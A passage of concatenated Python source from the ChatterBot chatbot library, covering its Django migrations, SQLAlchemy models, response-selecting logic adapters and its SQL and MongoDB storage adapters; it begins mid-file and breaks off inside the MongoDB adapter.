field=models.DateTimeField( default=django.utils.timezone.now, help_text='The date and time that this response was created at.' ), ), ] File: chatterbot/ext/django_chatterbot/migrations/0008_update_conversations.py # Generated by Django 1.11 on 2017-07-18 11:25 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0007_response_created_at'), ] operations = [ migrations.RemoveField( model_name='conversation', name='statements', ), migrations.RemoveField( model_name='response', name='occurrence', ), migrations.RemoveField( model_name='statement', name='created_at', ), migrations.AddField( model_name='conversation', name='responses', field=models.ManyToManyField(help_text='The responses in this conversation.', related_name='conversations', to='django_chatterbot.Response'), ), ] File: chatterbot/ext/django_chatterbot/migrations/0010_statement_text.py # Generated by Django 1.11.4 on 2017-08-16 00:56 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0009_tags'), ] operations = [ migrations.AlterField( model_name='statement', name='text', field=models.CharField(max_length=400, unique=True), ), ] File: chatterbot/ext/django_chatterbot/migrations/0012_statement_created_at.py from django.db import migrations, models import django.utils.timezone class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0011_blank_extra_data'), ] operations = [ migrations.AddField( model_name='statement', name='created_at', field=models.DateTimeField( default=django.utils.timezone.now, help_text='The date and time that the statement was created at.' ), ), ] File: chatterbot/ext/django_chatterbot/migrations/__init__.py File: chatterbot/ext/django_chatterbot/migrations/0005_statement_created_at.py # Generated by Django 1.10.1 on 2016-12-29 19:20 from django.db import migrations, models import django.utils.timezone class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0004_rename_in_response_to'), ] operations = [ migrations.AddField( model_name='statement', name='created_at', field=models.DateTimeField( default=django.utils.timezone.now, help_text='The date and time that this statement was created at.' ), ), ] File: chatterbot/ext/django_chatterbot/migrations/0006_create_conversation.py # Generated by Django 1.9 on 2017-01-17 07:02 from django.db import migrations, models import django.db.models.deletion import django.utils.timezone class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0005_statement_created_at'), ] operations = [ migrations.CreateModel( name='Conversation', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ], ), migrations.AlterField( model_name='statement', name='created_at', field=models.DateTimeField(default=django.utils.timezone.now, help_text='The date and time that this statement was created at.'), ), migrations.AddField( model_name='conversation', name='statements', field=models.ManyToManyField(help_text='The statements in this conversation.', related_name='conversation', to='django_chatterbot.Statement'), ), ] File: chatterbot/ext/django_chatterbot/migrations/0002_statement_extra_data.py # Generated by Django 1.10.2 on 2016-10-30 12:13 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0001_initial'), ] operations = [ migrations.AddField( model_name='statement', name='extra_data', field=models.CharField(default='{}', max_length=500), preserve_default=False, ), ] File: chatterbot/ext/django_chatterbot/migrations/0011_blank_extra_data.py # Generated by Django 1.11.4 on 2017-08-20 13:55 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0010_statement_text'), ] operations = [ migrations.AlterField( model_name='statement', name='extra_data', field=models.CharField(blank=True, max_length=500), ), ] File: chatterbot/ext/django_chatterbot/migrations/0009_tags.py # Generated by Django 1.11a1 on 2017-07-07 00:12 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0008_update_conversations'), ] operations = [ migrations.CreateModel( name='Tag', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.SlugField()), ], options={ 'abstract': False, }, ), migrations.AlterField( model_name='statement', name='text', field=models.CharField(max_length=255, unique=True), ), migrations.AddField( model_name='tag', name='statements', field=models.ManyToManyField(related_name='tags', to='django_chatterbot.Statement'), ), ] File: chatterbot/ext/django_chatterbot/migrations/0014_remove_statement_extra_data.py from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0013_change_conversations'), ] operations = [ migrations.RemoveField( model_name='statement', name='extra_data', ), ] File: chatterbot/ext/django_chatterbot/migrations/0003_change_occurrence_default.py # Generated by Django 1.9 on 2016-12-12 00:06 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0002_statement_extra_data'), ] operations = [ migrations.AlterField( model_name='response', name='occurrence', field=models.PositiveIntegerField(default=1), ), ] File: chatterbot/ext/django_chatterbot/migrations/0001_initial.py from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [] operations = [ migrations.CreateModel( name='Response', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('occurrence', models.PositiveIntegerField(default=0)), ], ), migrations.CreateModel( name='Statement', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('text', models.CharField(max_length=255, unique=True)), ], ), migrations.AddField( model_name='response', name='response', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='django_chatterbot.Statement'), ), migrations.AddField( model_name='response', name='statement', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='in_response_to', to='django_chatterbot.Statement'), ), ] File: chatterbot/ext/django_chatterbot/migrations/0015_statement_persona.py from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0014_remove_statement_extra_data'), ] operations = [ migrations.AddField( model_name='statement', name='persona', field=models.CharField(default='', max_length=50), preserve_default=False, ), ] File: chatterbot/ext/sqlalchemy_app/models.py from sqlalchemy import Table, Column, Integer, String, DateTime, ForeignKey from sqlalchemy.orm import relationship from sqlalchemy.sql import func from sqlalchemy.ext.declarative import declared_attr, declarative_base from chatterbot.conversation import StatementMixin from chatterbot import constants class ModelBase(object): """ An augmented base class for SqlAlchemy models. """ @declared_attr def __tablename__(cls): """ Return the lowercase class name as the name of the table. """ return cls.__name__.lower() id = Column( Integer, primary_key=True, autoincrement=True ) Base = declarative_base(cls=ModelBase) tag_association_table = Table( 'tag_association', Base.metadata, Column('tag_id', Integer, ForeignKey('tag.id')), Column('statement_id', Integer, ForeignKey('statement.id')) ) class Tag(Base): """ A tag that describes a statement. """ name = Column( String(constants.TAG_NAME_MAX_LENGTH), unique=True ) class Statement(Base, StatementMixin): """ A Statement represents a sentence or phrase. """ confidence = 0 text = Column( String(constants.STATEMENT_TEXT_MAX_LENGTH) ) search_text = Column( String(constants.STATEMENT_TEXT_MAX_LENGTH), nullable=False, server_default='' ) conversation = Column( String(constants.CONVERSATION_LABEL_MAX_LENGTH), nullable=False, server_default='' ) created_at = Column( DateTime(timezone=True), server_default=func.now() ) tags = relationship( 'Tag', secondary=lambda: tag_association_table, backref='statements' ) in_response_to = Column( String(constants.STATEMENT_TEXT_MAX_LENGTH), nullable=True ) search_in_response_to = Column( String(constants.STATEMENT_TEXT_MAX_LENGTH), nullable=False, server_default='' ) persona = Column( String(constants.PERSONA_MAX_LENGTH), nullable=False, server_default='' ) def get_tags(self): """ Return a list of tags for this statement. """ return [tag.name for tag in self.tags] def add_tags(self, *tags): """ Add a list of strings to the statement as tags. """ self.tags.extend([ Tag(name=tag) for tag in tags ]) File: chatterbot/ext/sqlalchemy_app/__init__.py File: chatterbot/logic/logic_adapter.py from chatterbot.adapters import Adapter from chatterbot.storage import StorageAdapter from chatterbot.search import IndexedTextSearch from chatterbot.conversation import Statement class LogicAdapter(Adapter): """ This is an abstract class that represents the interface that all logic adapters should implement. :param search_algorithm_name: The name of the search algorithm that should be used to search for close matches to the provided input. Defaults to the value of ``Search.name``. :param maximum_similarity_threshold: The maximum amount of similarity between two statement that is required before the search process is halted. The search for a matching statement will continue until a statement with a greater than or equal similarity is found or the search set is exhausted. Defaults to 0.95 :param response_selection_method: The a response selection method. Defaults to ``get_first_response`` :type response_selection_method: collections.abc.Callable :param default_response: The default response returned by this logic adaper if there is no other possible response to return. :type default_response: str or list or tuple """ def __init__(self, chatbot, **kwargs): super().__init__(chatbot, **kwargs) from chatterbot.response_selection import get_first_response self.search_algorithm_name = kwargs.get( 'search_algorithm_name', IndexedTextSearch.name ) self.search_algorithm = self.chatbot.search_algorithms[ self.search_algorithm_name ] self.maximum_similarity_threshold = kwargs.get( 'maximum_similarity_threshold', 0.95 ) # By default, select the first available response self.select_response = kwargs.get( 'response_selection_method', get_first_response ) default_responses = kwargs.get('default_response', []) # Convert a single string into a list if isinstance(default_responses, str): default_responses = [ default_responses ] self.default_responses = [ Statement(text=default) for default in default_responses ] def can_process(self, statement): """ A preliminary check that is called to determine if a logic adapter can process a given statement. By default, this method returns true but it can be overridden in child classes as needed. :rtype: bool """ return True def process(self, statement, additional_response_selection_parameters=None): """ Override this method and implement your logic for selecting a response to an input statement. A confidence value and the selected response statement should be returned. The confidence value represents a rating of how accurate the logic adapter expects the selected response to be. Confidence scores are used to select the best response from multiple logic adapters. The confidence value should be a number between 0 and 1 where 0 is the lowest confidence level and 1 is the highest. :param statement: An input statement to be processed by the logic adapter. :type statement: Statement :param additional_response_selection_parameters: Parameters to be used when filtering results to choose a response from. :type additional_response_selection_parameters: dict :rtype: Statement """ raise self.AdapterMethodNotImplementedError() def get_default_response(self, input_statement): """ This method is called when a logic adapter is unable to generate any other meaningful response. """ from random import choice if self.default_responses: response = choice(self.default_responses) else: try: response = self.chatbot.storage.get_random() except StorageAdapter.EmptyDatabaseException: response = input_statement self.chatbot.logger.info( 'No known response to the input was found. Selecting a random response.' ) # Set confidence to zero because a random response is selected response.confidence = 0 return response @property def class_name(self): """ Return the name of the current logic adapter class. This is typically used for logging and debugging. """ return str(self.__class__.__name__) File: chatterbot/logic/__init__.py from chatterbot.logic.logic_adapter import LogicAdapter from chatterbot.logic.best_match import BestMatch from chatterbot.logic.mathematical_evaluation import MathematicalEvaluation from chatterbot.logic.specific_response import SpecificResponseAdapter from chatterbot.logic.time_adapter import TimeLogicAdapter from chatterbot.logic.unit_conversion import UnitConversion __all__ = ( 'LogicAdapter', 'BestMatch', 'MathematicalEvaluation', 'SpecificResponseAdapter', 'TimeLogicAdapter', 'UnitConversion', ) File: chatterbot/logic/best_match.py from chatterbot.logic import LogicAdapter from chatterbot import filters class BestMatch(LogicAdapter): """ A logic adapter that returns a response based on known responses to the closest matches to the input statement. :param excluded_words: The excluded_words parameter allows a list of words to be set that will prevent the logic adapter from returning statements that have text containing any of those words. This can be useful for preventing your chat bot from saying swears when it is being demonstrated in front of an audience. Defaults to None :type excluded_words: list """ def __init__(self, chatbot, **kwargs): super().__init__(chatbot, **kwargs) self.excluded_words = kwargs.get('excluded_words') def process(self, input_statement, additional_response_selection_parameters=None): search_results = self.search_algorithm.search(input_statement) # Use the input statement as the closest match if no other results are found closest_match = next(search_results, input_statement) # Search for the closest match to the input statement for result in search_results: closest_match = result # Stop searching if a match that is close enough is found if result.confidence >= self.maximum_similarity_threshold: break self.chatbot.logger.info('Using "{}" as a close match to "{}" with a confidence of {}'.format( closest_match.text, input_statement.text, closest_match.confidence )) recent_repeated_responses = filters.get_recent_repeated_responses( self.chatbot, input_statement.conversation ) for index, recent_repeated_response in enumerate(recent_repeated_responses): self.chatbot.logger.info('{}. Excluding recent repeated response of "{}"'.format( index, recent_repeated_response )) response_selection_parameters = { 'search_in_response_to': closest_match.search_text, 'exclude_text': recent_repeated_responses, 'exclude_text_words': self.excluded_words } alternate_response_selection_parameters = { 'search_in_response_to': self.chatbot.storage.tagger.get_text_index_string( input_statement.text ), 'exclude_text': recent_repeated_responses, 'exclude_text_words': self.excluded_words } if additional_response_selection_parameters: response_selection_parameters.update(additional_response_selection_parameters) alternate_response_selection_parameters.update(additional_response_selection_parameters) # Get all statements that are in response to the closest match response_list = list(self.chatbot.storage.filter(**response_selection_parameters)) alternate_response_list = [] if not response_list: self.chatbot.logger.info('No responses found. Generating alternate response list.') alternate_response_list = list(self.chatbot.storage.filter(**alternate_response_selection_parameters)) if response_list: self.chatbot.logger.info( 'Selecting response from {} optimal responses.'.format( len(response_list) ) ) response = self.select_response( input_statement, response_list, self.chatbot.storage ) response.confidence = closest_match.confidence self.chatbot.logger.info('Response selected. Using "{}"'.format(response.text)) elif alternate_response_list: ''' The case where there was no responses returned for the selected match but a value exists for the statement the match is in response to. ''' self.chatbot.logger.info( 'Selecting response from {} optimal alternate responses.'.format( len(alternate_response_list) ) ) response = self.select_response( input_statement, alternate_response_list, self.chatbot.storage ) response.confidence = closest_match.confidence self.chatbot.logger.info('Alternate response selected. Using "{}"'.format(response.text)) else: response = self.get_default_response(input_statement) return response File: chatterbot/logic/mathematical_evaluation.py from chatterbot.logic import LogicAdapter from chatterbot.conversation import Statement from chatterbot import languages class MathematicalEvaluation(LogicAdapter): """ The MathematicalEvaluation logic adapter parses input to determine whether the user is asking a question that requires math to be done. If so, the equation is extracted from the input and returned with the evaluated result. For example: User: 'What is three plus five?' Bot: 'Three plus five equals eight' :kwargs: * *language* (``object``) -- The language is set to ``chatterbot.languages.ENG`` for English by default. """ def __init__(self, chatbot, **kwargs): super().__init__(chatbot, **kwargs) self.language = kwargs.get('language', languages.ENG) self.cache = {} def can_process(self, statement): """ Determines whether it is appropriate for this adapter to respond to the user input. """ response = self.process(statement) self.cache[statement.text] = response return response.confidence == 1 def process(self, statement, additional_response_selection_parameters=None): """ Takes a statement string. Returns the equation from the statement with the mathematical terms solved. """ from mathparse import mathparse input_text = statement.text # Use the result cached by the process method if it exists if input_text in self.cache: cached_result = self.cache[input_text] self.cache = {} return cached_result # Getting the mathematical terms within the input statement expression = mathparse.extract_expression(input_text, language=self.language.ISO_639.upper()) response = Statement(text=expression) try: response.text = '{} = {}'.format( response.text, mathparse.parse(expression, language=self.language.ISO_639.upper()) ) # The confidence is 1 if the expression could be evaluated response.confidence = 1 except mathparse.PostfixTokenEvaluationException: response.confidence = 0 return response File: chatterbot/logic/unit_conversion.py from chatterbot.logic import LogicAdapter from chatterbot.conversation import Statement from chatterbot.exceptions import OptionalDependencyImportError from chatterbot import languages from chatterbot import parsing from mathparse import mathparse import re class UnitConversion(LogicAdapter): """ The UnitConversion logic adapter parse inputs to convert values between several metric units. For example: User: 'How many meters are in one kilometer?' Bot: '1000.0' :kwargs: * *language* (``object``) -- The language is set to ``chatterbot.languages.ENG`` for English by default. """ def __init__(self, chatbot, **kwargs): super().__init__(chatbot, **kwargs) try: from pint import UnitRegistry except ImportError: message = ( 'Unable to import "pint".\n' 'Please install "pint" before using the UnitConversion logic adapter:\n' 'pip3 install pint' ) raise OptionalDependencyImportError(message) self.language = kwargs.get('language', languages.ENG) self.cache = {} self.patterns = [ ( re.compile(r''' (([Hh]ow\s+many)\s+ (?P<target>\S+)\s+ # meter, celsius, hours ((are)*\s*in)\s+ (?P<number>([+-]?\d+(?:\.\d+)?)|(a|an)|(%s[-\s]?)+)\s+ (?P<from>\S+)\s*) # meter, celsius, hours ''' % (parsing.numbers), (re.VERBOSE | re.IGNORECASE) ), lambda m: self.handle_matches(m) ), ( re.compile(r''' ((?P<number>([+-]?\d+(?:\.\d+)?)|(%s[-\s]?)+)\s+ (?P<from>\S+)\s+ # meter, celsius, hours (to)\s+ (?P<target>\S+)\s*) # meter, celsius, hours ''' % (parsing.numbers), (re.VERBOSE | re.IGNORECASE) ), lambda m: self.handle_matches(m) ), ( re.compile(r''' ((?P<number>([+-]?\d+(?:\.\d+)?)|(a|an)|(%s[-\s]?)+)\s+ (?P<from>\S+)\s+ # meter, celsius, hours (is|are)\s+ (how\s+many)*\s+ (?P<target>\S+)\s*) # meter, celsius, hours ''' % (parsing.numbers), (re.VERBOSE | re.IGNORECASE) ), lambda m: self.handle_matches(m) ) ] self.unit_registry = UnitRegistry() def get_unit(self, unit_variations): """ Get the first match unit metric object supported by pint library given a variation of unit metric names (Ex:['HOUR', 'hour']). :param unit_variations: A list of strings with names of units :type unit_variations: str """ for unit in unit_variations: try: return getattr(self.unit_registry, unit) except Exception: continue return None def get_valid_units(self, from_unit, target_unit): """ Returns the first match `pint.unit.Unit` object for from_unit and target_unit strings from a possible variation of metric unit names supported by pint library. :param from_unit: source metric unit :type from_unit: str :param from_unit: target metric unit :type from_unit: str """ from_unit_variations = [from_unit.lower(), from_unit.upper()] target_unit_variations = [target_unit.lower(), target_unit.upper()] from_unit = self.get_unit(from_unit_variations) target_unit = self.get_unit(target_unit_variations) return from_unit, target_unit def handle_matches(self, match): """ Returns a response statement from a matched input statement. :param match: It is a valid matched pattern from the input statement :type: `_sre.SRE_Match` """ response = Statement(text='') from_parsed = match.group("from") target_parsed = match.group("target") n_statement = match.group("number") if n_statement == 'a' or n_statement == 'an': n_statement = '1.0' n = mathparse.parse(n_statement, self.language.ISO_639.upper()) from_parsed, target_parsed = self.get_valid_units(from_parsed, target_parsed) if from_parsed is None or target_parsed is None: response.confidence = 0.0 else: from_value = self.unit_registry.Quantity(float(n), from_parsed) target_value = from_value.to(target_parsed) response.confidence = 1.0 response.text = str(target_value.magnitude) return response def can_process(self, statement): response = self.process(statement) self.cache[statement.text] = response return response.confidence == 1.0 def process(self, statement, additional_response_selection_parameters=None): response = Statement(text='') input_text = statement.text try: # Use the result cached by the process method if it exists if input_text in self.cache: response = self.cache[input_text] self.cache = {} return response for pattern, func in self.patterns: p = pattern.match(input_text) if p is not None: response = func(p) if response.confidence == 1.0: break except Exception: response.confidence = 0.0 finally: return response File: chatterbot/logic/specific_response.py from chatterbot.logic import LogicAdapter class SpecificResponseAdapter(LogicAdapter): """ Return a specific response to a specific input. :kwargs: * *input_text* (``str``) -- The input text that triggers this logic adapter. * *output_text* (``str``) -- The output text returned by this logic adapter. """ def __init__(self, chatbot, **kwargs): super().__init__(chatbot, **kwargs) from chatterbot.conversation import Statement self.input_text = kwargs.get('input_text') output_text = kwargs.get('output_text') self.response_statement = Statement(text=output_text) def can_process(self, statement): if statement.text == self.input_text: return True return False def process(self, statement, additional_response_selection_parameters=None): if statement.text == self.input_text: self.response_statement.confidence = 1 else: self.response_statement.confidence = 0 return self.response_statement File: chatterbot/logic/time_adapter.py from datetime import datetime from chatterbot.logic import LogicAdapter from chatterbot.conversation import Statement from chatterbot.exceptions import OptionalDependencyImportError class TimeLogicAdapter(LogicAdapter): """ The TimeLogicAdapter returns the current time. :kwargs: * *positive* (``list``) -- The time-related questions used to identify time questions. Defaults to a list of English sentences. * *negative* (``list``) -- The non-time-related questions used to identify time questions. Defaults to a list of English sentences. """ def __init__(self, chatbot, **kwargs): super().__init__(chatbot, **kwargs) try: from nltk import NaiveBayesClassifier except ImportError: message = ( 'Unable to import "nltk".\n' 'Please install "nltk" before using the TimeLogicAdapter:\n' 'pip3 install nltk' ) raise OptionalDependencyImportError(message) self.positive = kwargs.get('positive', [ 'what time is it', 'hey what time is it', 'do you have the time', 'do you know the time', 'do you know what time it is', 'what is the time' ]) self.negative = kwargs.get('negative', [ 'it is time to go to sleep', 'what is your favorite color', 'i had a great time', 'thyme is my favorite herb', 'do you have time to look at my essay', 'how do you have the time to do all this' 'what is it' ]) labeled_data = ( [ (name, 0) for name in self.negative ] + [ (name, 1) for name in self.positive ] ) train_set = [ (self.time_question_features(text), n) for (text, n) in labeled_data ] self.classifier = NaiveBayesClassifier.train(train_set) def time_question_features(self, text): """ Provide an analysis of significant features in the string. """ features = {} # A list of all words from the known sentences all_words = " ".join(self.positive + self.negative).split() # A list of the first word in each of the known sentence all_first_words = [] for sentence in self.positive + self.negative: all_first_words.append( sentence.split(' ', 1)[0] ) for word in text.split(): features['first_word({})'.format(word)] = (word in all_first_words) for word in text.split(): features['contains({})'.format(word)] = (word in all_words) for letter in 'abcdefghijklmnopqrstuvwxyz': features['count({})'.format(letter)] = text.lower().count(letter) features['has({})'.format(letter)] = (letter in text.lower()) return features def process(self, statement, additional_response_selection_parameters=None): now = datetime.now() time_features = self.time_question_features(statement.text.lower()) confidence = self.classifier.classify(time_features) response = Statement(text='The current time is ' + now.strftime('%I:%M %p')) response.confidence = confidence return response File: chatterbot/storage/sql_storage.py from chatterbot.storage import StorageAdapter class SQLStorageAdapter(StorageAdapter): """ The SQLStorageAdapter allows ChatterBot to store conversation data in any database supported by the SQL Alchemy ORM. All parameters are optional, by default a sqlite database is used. It will check if tables are present, if they are not, it will attempt to create the required tables. :keyword database_uri: eg: sqlite:///database_test.sqlite3', The database_uri can be specified to choose database driver. :type database_uri: str """ def __init__(self, **kwargs): super().__init__(**kwargs) from sqlalchemy import create_engine from sqlalchemy.orm import sessionmaker self.database_uri = kwargs.get('database_uri', False) # None results in a sqlite in-memory database as the default if self.database_uri is None: self.database_uri = 'sqlite://' # Create a file database if the database is not a connection string if not self.database_uri: self.database_uri = 'sqlite:///db.sqlite3' self.engine = create_engine(self.database_uri, convert_unicode=True) if self.database_uri.startswith('sqlite://'): from sqlalchemy.engine import Engine from sqlalchemy import event @event.listens_for(Engine, 'connect') def set_sqlite_pragma(dbapi_connection, connection_record): dbapi_connection.execute('PRAGMA journal_mode=WAL') dbapi_connection.execute('PRAGMA synchronous=NORMAL') if not self.engine.dialect.has_table(self.engine, 'Statement'): self.create_database() self.Session = sessionmaker(bind=self.engine, expire_on_commit=True) def get_statement_model(self): """ Return the statement model. """ from chatterbot.ext.sqlalchemy_app.models import Statement return Statement def get_tag_model(self): """ Return the conversation model. """ from chatterbot.ext.sqlalchemy_app.models import Tag return Tag def model_to_object(self, statement): from chatterbot.conversation import Statement as StatementObject return StatementObject(**statement.serialize()) def count(self): """ Return the number of entries in the database. """ Statement = self.get_model('statement') session = self.Session() statement_count = session.query(Statement).count() session.close() return statement_count def remove(self, statement_text): """ Removes the statement that matches the input text. Removes any responses from statements where the response text matches the input text. """ Statement = self.get_model('statement') session = self.Session() query = session.query(Statement).filter_by(text=statement_text) record = query.first() session.delete(record) self._session_finish(session) def filter(self, **kwargs): """ Returns a list of objects from the database. The kwargs parameter can contain any number of attributes. Only objects which contain all listed attributes and in which all values match for all listed attributes will be returned. """ from sqlalchemy import or_ Statement = self.get_model('statement') Tag = self.get_model('tag') session = self.Session() page_size = kwargs.pop('page_size', 1000) order_by = kwargs.pop('order_by', None) tags = kwargs.pop('tags', []) exclude_text = kwargs.pop('exclude_text', None) exclude_text_words = kwargs.pop('exclude_text_words', []) persona_not_startswith = kwargs.pop('persona_not_startswith', None) search_text_contains = kwargs.pop('search_text_contains', None) # Convert a single sting into a list if only one tag is provided if type(tags) == str: tags = [tags] if len(kwargs) == 0: statements = session.query(Statement).filter() else: statements = session.query(Statement).filter_by(**kwargs) if tags: statements = statements.join(Statement.tags).filter( Tag.name.in_(tags) ) if exclude_text: statements = statements.filter( ~Statement.text.in_(exclude_text) ) if exclude_text_words: or_word_query = [ Statement.text.ilike('%' + word + '%') for word in exclude_text_words ] statements = statements.filter( ~or_(*or_word_query) ) if persona_not_startswith: statements = statements.filter( ~Statement.persona.startswith('bot:') ) if search_text_contains: or_query = [ Statement.search_text.contains(word) for word in search_text_contains.split(' ') ] statements = statements.filter( or_(*or_query) ) if order_by: if 'created_at' in order_by: index = order_by.index('created_at') order_by[index] = Statement.created_at.asc() statements = statements.order_by(*order_by) total_statements = statements.count() for start_index in range(0, total_statements, page_size): for statement in statements.slice(start_index, start_index + page_size): yield self.model_to_object(statement) session.close() def create(self, **kwargs): """ Creates a new statement matching the keyword arguments specified. Returns the created statement. """ Statement = self.get_model('statement') Tag = self.get_model('tag') session = self.Session() tags = set(kwargs.pop('tags', [])) if 'search_text' not in kwargs: kwargs['search_text'] = self.tagger.get_text_index_string(kwargs['text']) if 'search_in_response_to' not in kwargs: in_response_to = kwargs.get('in_response_to') if in_response_to: kwargs['search_in_response_to'] = self.tagger.get_text_index_string(in_response_to) statement = Statement(**kwargs) for tag_name in tags: tag = session.query(Tag).filter_by(name=tag_name).first() if not tag: # Create the tag tag = Tag(name=tag_name) statement.tags.append(tag) session.add(statement) session.flush() session.refresh(statement) statement_object = self.model_to_object(statement) self._session_finish(session) return statement_object def create_many(self, statements): """ Creates multiple statement entries. """ Statement = self.get_model('statement') Tag = self.get_model('tag') session = self.Session() create_statements = [] create_tags = {} for statement in statements: statement_data = statement.serialize() tag_data = statement_data.pop('tags', []) statement_model_object = Statement(**statement_data) if not statement.search_text: statement_model_object.search_text = self.tagger.get_text_index_string(statement.text) if not statement.search_in_response_to and statement.in_response_to: statement_model_object.search_in_response_to = self.tagger.get_text_index_string(statement.in_response_to) new_tags = set(tag_data) - set(create_tags.keys()) if new_tags: existing_tags = session.query(Tag).filter( Tag.name.in_(new_tags) ) for existing_tag in existing_tags: create_tags[existing_tag.name] = existing_tag for tag_name in tag_data: if tag_name in create_tags: tag = create_tags[tag_name] else: # Create the tag if it does not exist tag = Tag(name=tag_name) create_tags[tag_name] = tag statement_model_object.tags.append(tag) create_statements.append(statement_model_object) session.add_all(create_statements) session.commit() def update(self, statement): """ Modifies an entry in the database. Creates an entry if one does not exist. """ Statement = self.get_model('statement') Tag = self.get_model('tag') if statement is not None: session = self.Session() record = None if hasattr(statement, 'id') and statement.id is not None: record = session.query(Statement).get(statement.id) else: record = session.query(Statement).filter( Statement.text == statement.text, Statement.conversation == statement.conversation, ).first() # Create a new statement entry if one does not already exist if not record: record = Statement( text=statement.text, conversation=statement.conversation, persona=statement.persona ) # Update the response value record.in_response_to = statement.in_response_to record.created_at = statement.created_at record.search_text = self.tagger.get_text_index_string(statement.text) if statement.in_response_to: record.search_in_response_to = self.tagger.get_text_index_string(statement.in_response_to) for tag_name in statement.get_tags(): tag = session.query(Tag).filter_by(name=tag_name).first() if not tag: # Create the record tag = Tag(name=tag_name) record.tags.append(tag) session.add(record) self._session_finish(session) def get_random(self): """ Returns a random statement from the database. """ import random Statement = self.get_model('statement') session = self.Session() count = self.count() if count < 1: raise self.EmptyDatabaseException() random_index = random.randrange(0, count) random_statement = session.query(Statement)[random_index] statement = self.model_to_object(random_statement) session.close() return statement def drop(self): """ Drop the database. """ Statement = self.get_model('statement') Tag = self.get_model('tag') session = self.Session() session.query(Statement).delete() session.query(Tag).delete() session.commit() session.close() def create_database(self): """ Populate the database with the tables. """ from chatterbot.ext.sqlalchemy_app.models import Base Base.metadata.create_all(self.engine) def _session_finish(self, session, statement_text=None): from sqlalchemy.exc import InvalidRequestError try: session.commit() except InvalidRequestError: # Log the statement text and the exception self.logger.exception(statement_text) finally: session.close() File: chatterbot/storage/mongodb.py import re from chatterbot.storage import StorageAdapter class MongoDatabaseAdapter(StorageAdapter): """ The MongoDatabaseAdapter is an interface that allows ChatterBot to store statements in a MongoDB database. :keyword database_uri: The URI of a remote instance of MongoDB. This can be any valid `MongoDB connection string <https://docs.mongodb.com/manual/reference/connection-string/>`_ :type database_uri: str .. code-block:: python database_uri='mongodb://example.com:8100/' """ def __init__(self, **kwargs): super().__init__(**kwargs) from pymongo import MongoClient from pymongo.errors import OperationFailure self.database_uri = kwargs.get( 'database_uri', 'mongodb://localhost:27017/chatterbot-database' ) # Use the default host and port self.client = MongoClient(self.database_uri) # Increase the sort buffer to 42M if possible try: self.client.admin.command({'setParameter': 1, 'internalQueryExecMaxBlockingSortBytes': 44040192}) except OperationFailure: pass # Specify the name of the database self.database = self.client.get_database() # The mongo collection of statement documents self.statements = self.database['statements'] def get_statement_model(self): """ Return the class for the statement model. """ from chatterbot.conversation import Statement # Create a storage-aware statement statement = Statement statement.storage = self return statement def count(self): return self.statements.count() def mongo_to_object(self, statement_data): """ Return Statement object when given data returned from Mongo DB. """ Statement = self.get_model('statement') statement_data['id'] = statement_data['_id'] return Statement(**statement_data) def filter(self, **kwargs): """ Returns a list of statements in the database that match the parameters specified. """ import pymongo page_size = kwargs.pop('page_size', 1000) order_by = kwargs.pop('order_by', None) tags = kwargs.pop('tags', []) exclude_text = kwargs.pop('exclude_text', None) exclude_text_words = kwargs.pop('exclude_text_words', []) persona_not_startswith = kwargs.pop('persona_not_startswith', None) search_text_contains = kwargs.pop('search_text_contains', None) if tags: kwargs['tags'] = { '$in': tags } if exclude_text: if 'text' not in kwargs: kwargs['text'] = {} elif 'text' in kwargs and isinstance(kwargs['text'], str): text = kwargs.pop('text') kwargs['text'] = { '$eq': text } kwargs['text']['$nin'] = exclude_text if exclude_text_words: if 'text' not in kwargs: kwargs['text'] = {} elif 'text' in kwargs and isinstance(kwargs['text'], str): text = kwargs.pop('text') kwargs['text'] = { '$eq': text } exclude_word_regex = '|'.join([ '.*{}.*'.format(word) for word in exclude_text_words ]) kwargs['text']['$not'] = re.compile(exclude_word_regex) if persona_not_startswith: if 'persona' not in kwargs: kwargs['persona'] = {} elif 'persona' in kwargs and isinstance(kwargs['persona'], str): persona = kwargs.pop('persona') kwargs['persona'] = { '$eq': persona } kwargs['persona']['$not'] = re.compile('^bot:*') if search_text_contains: or_regex = '|'.join([ '{}'.format(re.escape(word)) for word in search_text_contains.split(' ') ]) kwargs['search_text'] = re.compile(or_regex) mongo_ordering = [] if order_by: # Sort so that newer datetimes appear first if 'created_at' in order_by: order_by.remove('created_at') mongo_ordering.append(('created_at', pymongo.DESCENDING, )) for order in order_by: mongo_ordering.append((order, pymongo.ASCENDING)) total_statements = self.statements.find(kwargs).count() for start_index in range(0, total_statements, page_size): if mongo_ordering: for match in self.statements.find(kwargs).sort(mongo_ordering).skip(start_index).limit(page_size): yield self.mongo_to_object(match) else: for match in self.statements.find(kwargs).skip(start_index).limit(page_size): yield self.mongo_to_object(match) def create(self, **kwargs): """ Creates a new statement matching the keyword arguments specified. Returns the created statement. """ Statement = self.get_model('statement') if 'tags' in kwargs: kwargs['tags'] = list(set(kwargs['tags'])) if 'search_text' not in kwargs: kwargs['search_text'] = self.tagger.get_text_index_string(kwargs['text']) if 'search_in_response_to' not in kwargs: if kwargs.get('in_response_to'): kwargs['search_in_response_to'] = self.tagger.get_text_index_string(kwargs['in_response_to']) inserted = self.statements.insert_one(kwargs) kwargs['id'] = inserted.inserted_id return Statement(**kwargs) def create_many(self, statements): """ Creates multiple 